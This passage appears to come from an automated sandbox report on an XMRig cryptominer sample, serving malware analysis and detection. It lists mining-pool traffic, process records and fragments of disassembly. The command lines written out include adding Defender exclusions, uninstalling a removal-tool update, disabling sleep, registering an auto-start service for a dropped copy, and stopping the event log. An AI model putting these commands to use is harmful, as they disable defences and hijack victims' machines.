                                                    Nov 17, 2024 19:22:23.488934994 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:24.168209076 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:24.223300934 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:35.220432997 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:35.270200014 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:45.222867966 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:45.270288944 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:22:55.359702110 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:22:55.410763979 CET4970510343192.168.2.851.89.23.91
                                                    Nov 17, 2024 19:23:05.249850035 CET103434970551.89.23.91192.168.2.8
                                                    Nov 17, 2024 19:23:05.301373959 CET4970510343192.168.2.851.89.23.91

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 17, 2024 19:21:10.672990084 CET6209253192.168.2.81.1.1.1
                                                    Nov 17, 2024 19:21:10.682054996 CET53620921.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 17, 2024 19:21:10.672990084 CET192.168.2.81.1.1.10x84a6Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                    Nov 17, 2024 19:21:10.682054996 CET1.1.1.1192.168.2.80x84a6No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Users\user\Desktop\4o8Tgrb384.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\4o8Tgrb384.exe"
                                                    Imagebase:0x7ff67c750000
                                                    File size:2'629'632 bytes
                                                    MD5 hash:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff705b20000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe delete "QVYJPHJR"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff77a780000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe start "QVYJPHJR"
                                                    Imagebase:0x7ff629be0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
                                                    Imagebase:0x7ff62d5f0000
                                                    File size:2'629'632 bytes
                                                    MD5 hash:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 63%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:13:21:06
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff705b20000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:13:21:08
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff77a780000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:38
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:13:21:09
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:svchost.exe
                                                    Imagebase:0x7ff67e6d0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:12.4%
                                                      Total number of Nodes:1502
                                                      Total number of Limit Nodes:2
                                                      execution_graph 4106 7ff67c751ac3 4110 7ff67c751a70 4106->4110 4107 7ff67c75199e 4109 7ff67c751a0f 4107->4109 4114 7ff67c7519e9 VirtualProtect 4107->4114 4108 7ff67c751b36 4111 7ff67c751ba0 4 API calls 4108->4111 4110->4107 4110->4108 4113 7ff67c751b5c 4110->4113 4112 7ff67c751b53 4111->4112 4114->4107 4165 7ff67c752104 4166 7ff67c752218 4165->4166 4167 7ff67c752111 EnterCriticalSection 4165->4167 4169 7ff67c752272 4166->4169 4171 7ff67c752241 DeleteCriticalSection 4166->4171 4173 7ff67c752230 free 4166->4173 4168 7ff67c75220b LeaveCriticalSection 4167->4168 4172 7ff67c75212e 4167->4172 4168->4166 4170 7ff67c75214d TlsGetValue GetLastError 4170->4172 4171->4169 4172->4168 4172->4170 4173->4171 4173->4173 4148 7ff67c751e65 4149 7ff67c751e67 signal 4148->4149 4150 7ff67c751e7c 4149->4150 4152 7ff67c751e99 4149->4152 4151 7ff67c751e82 signal 4150->4151 4150->4152 4151->4152 4194 7ff67c75219e 4195 7ff67c7521ab EnterCriticalSection 4194->4195 4196 7ff67c752272 4194->4196 4197 7ff67c752265 LeaveCriticalSection 4195->4197 4199 7ff67c7521c8 4195->4199 4197->4196 4198 7ff67c7521e9 TlsGetValue GetLastError 4198->4199 4199->4197 4199->4198 2638 7ff67c751140 2641 7ff67c751160 2638->2641 2640 7ff67c751156 2642 7ff67c75118b 2641->2642 2643 7ff67c7511b9 2641->2643 2642->2643 2646 7ff67c751190 2642->2646 2644 7ff67c7511c7 _amsg_exit 2643->2644 2645 7ff67c7511d3 2643->2645 2644->2645 2648 7ff67c75121a 2645->2648 2649 7ff67c751201 _initterm 2645->2649 2646->2643 2647 7ff67c7511a0 Sleep 2646->2647 2647->2643 2647->2646 2666 7ff67c751880 2648->2666 2649->2648 2652 7ff67c75126a 2653 7ff67c75126f malloc 2652->2653 2654 7ff67c75128b 2653->2654 2657 7ff67c7512d2 2653->2657 2655 7ff67c7512a0 strlen malloc memcpy 2654->2655 2655->2655 2656 7ff67c7512d0 2655->2656 2656->2657 2679 7ff67c753b50 2657->2679 2659 7ff67c751315 2660 7ff67c751344 2659->2660 2661 7ff67c751324 2659->2661 2664 7ff67c751160 93 API calls 2660->2664 2662 7ff67c75132d _cexit 2661->2662 2663 7ff67c751338 2661->2663 2662->2663 2663->2640 2665 7ff67c751366 2664->2665 2665->2640 2667 7ff67c751247 SetUnhandledExceptionFilter 2666->2667 2668 7ff67c7518a2 2666->2668 2667->2652 2668->2667 2669 7ff67c75194d 2668->2669 2675 7ff67c751a20 2668->2675 2672 7ff67c75199e 2669->2672 2673 7ff67c751956 2669->2673 2671 7ff67c7519e9 VirtualProtect 2671->2672 2672->2667 2672->2671 2673->2672 2854 7ff67c751ba0 2673->2854 2674 7ff67c751b5c 2675->2672 2675->2674 2676 7ff67c751b36 2675->2676 2677 7ff67c751ba0 4 API calls 2676->2677 2678 7ff67c751b53 2677->2678 2682 7ff67c753b66 2679->2682 2680 7ff67c753c60 wcslen 2864 7ff67c75153f 2680->2864 2682->2680 2686 7ff67c753d60 2689 7ff67c753d7a memset wcscat memset 2686->2689 2691 7ff67c753dd3 2689->2691 2692 7ff67c753e23 wcslen 2691->2692 2693 7ff67c753e35 2692->2693 2697 7ff67c753e7c 2692->2697 2694 7ff67c753e50 _wcsnicmp 2693->2694 2695 7ff67c753e66 wcslen 2694->2695 2694->2697 2695->2694 2695->2697 2696 7ff67c753edd wcscpy wcscat memset 2699 7ff67c753f1c 2696->2699 2697->2696 2698 7ff67c754024 wcscpy wcscat 2700 7ff67c75404f memset 2698->2700 2705 7ff67c754131 2698->2705 2699->2698 2701 7ff67c754070 2700->2701 2702 7ff67c7540d5 wcslen 2701->2702 2704 7ff67c7540eb 2702->2704 2711 7ff67c75412c 2702->2711 2706 7ff67c754100 _wcsnicmp 2704->2706 3024 7ff67c752df0 2705->3024 2707 7ff67c754116 wcslen 2706->2707 2706->2711 2707->2706 2707->2711 2708 7ff67c7543a3 wcscpy wcscat memset 2710 7ff67c7543e5 2708->2710 2709 7ff67c75442a wcscpy wcscat memset 2712 7ff67c754470 2709->2712 2710->2709 2711->2708 2713 7ff67c7544d5 wcscpy wcscat memset 2712->2713 2714 7ff67c75451b 2713->2714 2715 